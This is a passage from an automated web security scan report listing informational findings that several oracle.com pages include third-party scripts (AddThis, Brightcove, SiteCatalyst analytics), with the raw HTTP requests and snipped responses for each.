20.213. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/jrockit/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/middleware/jrockit/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41053722343588042,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 166389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.214. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/soasuite/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/middleware/soasuite/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35879579537054133,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 252619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.215. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/downloads/index-084446.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/oem/downloads/index-084446.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075811361962283,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.216. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/oem/grid-control/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=5;ecid=35984896431701435,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.217. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=40974493081910025,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.218. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/oem/grid-control/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35939369777676995,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140888

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.219. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oramag/magazine/home/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075635268300620,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.220. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/server-storage/solaris/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/server-storage/solaris/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=201;ecid=41086548779348015,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.221. http://www.oracle.com/technetwork/systems/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/systems/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/systems/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41054851921233213,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.222. http://www.oracle.com/technetwork/topics/cloud/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/cloud/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41157789402743118,0:1)
Date: Tue, 06 Sep 2011 16:09:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.223. http://www.oracle.com/technetwork/topics/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35729659410112168,0:1)
Date: Tue, 06 Sep 2011 16:08:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.224. http://www.oracle.com/technetwork/topics/newtojava/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/newtojava/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/newtojava/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070021745959460,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110971

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.225. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/newtojava/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/newtojava/overview/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/topics/newtojava/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116059499862577,0:1)
Content-Length: 135188
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.226. http://www.oracle.com/technetwork/topics/security/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/security/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/security/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35637678389099849,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.227. http://www.oracle.com/technetwork/topics/soa/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/soa/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/soa/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41151892412556860,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.228. http://www.oracle.com/technetwork/topics/virtualization/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/virtualization/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /technetwork/topics/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=245;ecid=41070124825176468,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.229. http://www.oracle.com/us/ciocentral/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/ciocentral/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /us/ciocentral/index.html?origref=http://www.oracle.com/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/cio/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343430587; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.oracle.com%25252Findex.html%252523%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35988164901865103,0:1)
Content-Length: 15880
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.230. http://www.oracle.com/us/community/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/community/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/community/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41183490487442251,0:1)
Date: Tue, 06 Sep 2011 16:16:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.231. http://www.oracle.com/us/corporate/Acquisitions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/Acquisitions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
